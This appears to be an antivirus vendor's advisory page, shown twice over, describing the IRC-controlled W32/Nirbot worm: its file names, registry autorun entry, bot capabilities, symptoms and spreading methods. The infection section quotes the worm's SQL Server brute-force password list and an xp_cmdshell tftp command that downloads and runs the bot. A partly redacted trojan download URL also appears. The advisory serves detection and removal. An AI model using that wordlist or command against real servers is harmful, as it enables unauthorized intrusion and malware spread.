McAfee > Theat Center > Virus Detail Page

Overview

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware, distribute illegal content or launch a DDos attack on internet systems.

This is a generic detection that covers many varients in this family. All these shares similar characteristics, such as being IRC (Internet Relay Chat) controlled bots, while others characteristics such as the file name may vary.

Aliases

• Backdoor.Vanbot.Gen!Pac (VirusBuster)

• Backdoor.Win32.VanBot.bj (Kaspersky)

• BDS/VanBot.BJ (Avira)

• W32.Rinbot!gen (Symantec)

• W32/Delbot-S (Sophos)

• W32/Rinbot.H!tr (Fortinet)

• W32/Rinbot.H.worm (Panda

Characteristics

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems. W32/Nirbot is written in C++ and is typically packed using various packers.

Upon execution, it creates a copy of itself into the Windows system directory:

Different variants uses different names and may use different locations. Names may includes:

• %Windir%\%SYSDIR%\zlclint.exe
• %Windir%\%SYSDIR%\mbp.exe
• %Windir%\%SYSDIR%\vxaudio.exe
• %Windir%\%SYSDIR%\rinvs.exe
• %Windir%\%SYSDIR%\dllhst.exe

and others

Adds the following values to the registry to auto start itself when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"DllHost" =""%Windir%\%SYSDIR%\dllhst.exe"

The registry key name and location may varies with different variants.

Some variants ave been observed downloading additional trojans such as

http://[omitted].118/MS0ffice.exe 

Most variants check if a debugger is present on the system and quit executing if present. This is done to prevent researchers from debugging the worm. Also checks and terminates some monitoring software to prevent research.

The following tasks can be performed using this bot.

• Gather system information (CPU, RAM, OS Version, IP address, UserName, Uptime)
• Scan network for machines to infect.
• Launch a TFTP, HTTP server and SOCKS4 proxy.
• Download and Execute files.
• Update bot.
• Uninstall bot.

Symptoms

Unusual network activity, in specific IRC traffic.

Presence of the above files in the system folders.

Unusual DNS quesries. Some variants have been observer sending DNS quesries for various non existant domains to verify the connection to a real DNS server to prevent research in simulated environment.

Method of Infection

W32/Nirbot.worm scans for vulnerable machines on the network, and uses the following vulnerabilities to spread.

• Microsoft Windows Server Service Buffer Overflow (MS06-040)
  
• Symantec Client Security and Symantec Antivirus Elevation of privilege vulnerability (SYM06-010)
  
• Weak password exploitation of SQL servers.

The bots scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

• administrator  
• administrador  
• administrateur 
• administrat
• admins 
• admin  
• adm
• password1  
• password   
• passwd 
• pass1234   
• pass   
• pwd
• 007
• 1  
• 12 
• 123
• 1234   
• 12345  
• 123456 
• 1234567
• 12345678   
• 123456789  
• 1234567890 
• 2000   
• 2001   
• 2002   
• 2003   
• 2004   
• test   
• guest  
• none   
• demo   
• unix   
• linux  
• changeme   
• default
• system 
• server 
• root   
• null   
• qwerty 
• mail   
• outlook
• web
• www
• internet   
• accounts   
• accounting 
• home   
• homeuser   
• user   
• oem
• oemuser
• oeminstall 
• windows
• win98  
• win2k  
• winxp  
• winnt  
• win2000
• qaz
• asd
• zxc
• qwe
• bob
• jen
• joe
• fred   
• bill   
• mike   
• john   
• peter  
• luke   
• sam
• sue
• susan  
• peter  
• brian  
• lee
• neil   
• ian
• chris  
• eric   
• george 
• kate   
• bob
• katie  
• mary   
• login  
• loginpass  
• technical  
• backup 
• exchange   
• f[omitted]k   
• b[omitted]h  
• s[omitted]t   
• s[omitted]x
• god
• hell   
• hello  
• domain 
• domainpass 
• domainpassword 
• database   
• access 
• dbpass 
• dbpassword 
• databasepass   
• data   
• databasepassword   
• db1
• db2
• db1234 
• sa 
• sql
• sqlpassoainstall   
• orainstall 
• oracle 
• ibm
• cisco  
• dell   
• compaq 
• siemens
• hp 
• nokia  
• xp 
• control
• office 
• blank  
• winpass
• main   
• lan
• internet   
• intranet   
• student
• teacher
• staff

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

• Weak password exploitation of network shares.

The bot attempts to spread by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants

N/A

All Information

Overview -

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware, distribute illegal content or launch a DDos attack on internet systems.

This is a generic detection that covers many varients in this family. All these shares similar characteristics, such as being IRC (Internet Relay Chat) controlled bots, while others characteristics such as the file name may vary.

Aliases

• Backdoor.Vanbot.Gen!Pac (VirusBuster)

• Backdoor.Win32.VanBot.bj (Kaspersky)

• BDS/VanBot.BJ (Avira)

• W32.Rinbot!gen (Symantec)

• W32/Delbot-S (Sophos)

• W32/Rinbot.H!tr (Fortinet)

• W32/Rinbot.H.worm (Panda

Characteristics

Characteristics -

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems. W32/Nirbot is written in C++ and is typically packed using various packers.

Upon execution, it creates a copy of itself into the Windows system directory:

Different variants uses different names and may use different locations. Names may includes:

• %Windir%\%SYSDIR%\zlclint.exe
• %Windir%\%SYSDIR%\mbp.exe
• %Windir%\%SYSDIR%\vxaudio.exe
• %Windir%\%SYSDIR%\rinvs.exe
• %Windir%\%SYSDIR%\dllhst.exe

and others

Adds the following values to the registry to auto start itself when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"DllHost" =""%Windir%\%SYSDIR%\dllhst.exe"

The registry key name and location may varies with different variants.

Some variants ave been observed downloading additional trojans such as

http://[omitted].118/MS0ffice.exe 

Most variants check if a debugger is present on the system and quit executing if present. This is done to prevent researchers from debugging the worm. Also checks and terminates some monitoring software to prevent research.

The following tasks can be performed using this bot.

• Gather system information (CPU, RAM, OS Version, IP address, UserName, Uptime)
• Scan network for machines to infect.
• Launch a TFTP, HTTP server and SOCKS4 proxy.
• Download and Execute files.
• Update bot.
• Uninstall bot.

Symptoms

Symptoms -

Unusual network activity, in specific IRC traffic.

Presence of the above files in the system folders.

Unusual DNS quesries. Some variants have been observer sending DNS quesries for various non existant domains to verify the connection to a real DNS server to prevent research in simulated environment.

Method of Infection

Method of Infection -

W32/Nirbot.worm scans for vulnerable machines on the network, and uses the following vulnerabilities to spread.

• Microsoft Windows Server Service Buffer Overflow (MS06-040)
  
• Symantec Client Security and Symantec Antivirus Elevation of privilege vulnerability (SYM06-010)
  
• Weak password exploitation of SQL servers.

The bots scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

• administrator  
• administrador  
• administrateur 
• administrat
• admins 
• admin  
• adm
• password1  
• password   
• passwd 
• pass1234   
• pass   
• pwd
• 007
• 1  
• 12 
• 123
• 1234   
• 12345  
• 123456 
• 1234567
• 12345678   
• 123456789  
• 1234567890 
• 2000   
• 2001   
• 2002   
• 2003   
• 2004   
• test   
• guest  
• none   
• demo   
• unix   
• linux  
• changeme   
• default
• system 
• server 
• root   
• null   
• qwerty 
• mail   
• outlook
• web
• www
• internet   
• accounts   
• accounting 
• home   
• homeuser   
• user   
• oem
• oemuser
• oeminstall 
• windows
• win98  
• win2k  
• winxp  
• winnt  
• win2000
• qaz
• asd
• zxc
• qwe
• bob
• jen
• joe
• fred   
• bill   
• mike   
• john   
• peter  
• luke   
• sam
• sue
• susan  
• peter  
• brian  
• lee
• neil   
• ian
• chris  
• eric   
• george 
• kate   
• bob
• katie  
• mary   
• login  
• loginpass  
• technical  
• backup 
• exchange   
• f[omitted]k   
• b[omitted]h  
• s[omitted]t   
• s[omitted]x
• god
• hell   
• hello  
• domain 
• domainpass 
• domainpassword 
• database   
• access 
• dbpass 
• dbpassword 
• databasepass   
• data   
• databasepassword   
• db1
• db2
• db1234 
• sa 
• sql
• sqlpassoainstall   
• orainstall 
• oracle 
• ibm
• cisco  
• dell   
• compaq 
• siemens
• hp 
• nokia  
• xp 
• control
• office 
• blank  
• winpass
• main   
• lan
• internet   
• intranet   
• student
• teacher
• staff

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

• Weak password exploitation of network shares.

The bot attempts to spread by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

Removal -

Removal -

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants -

N/A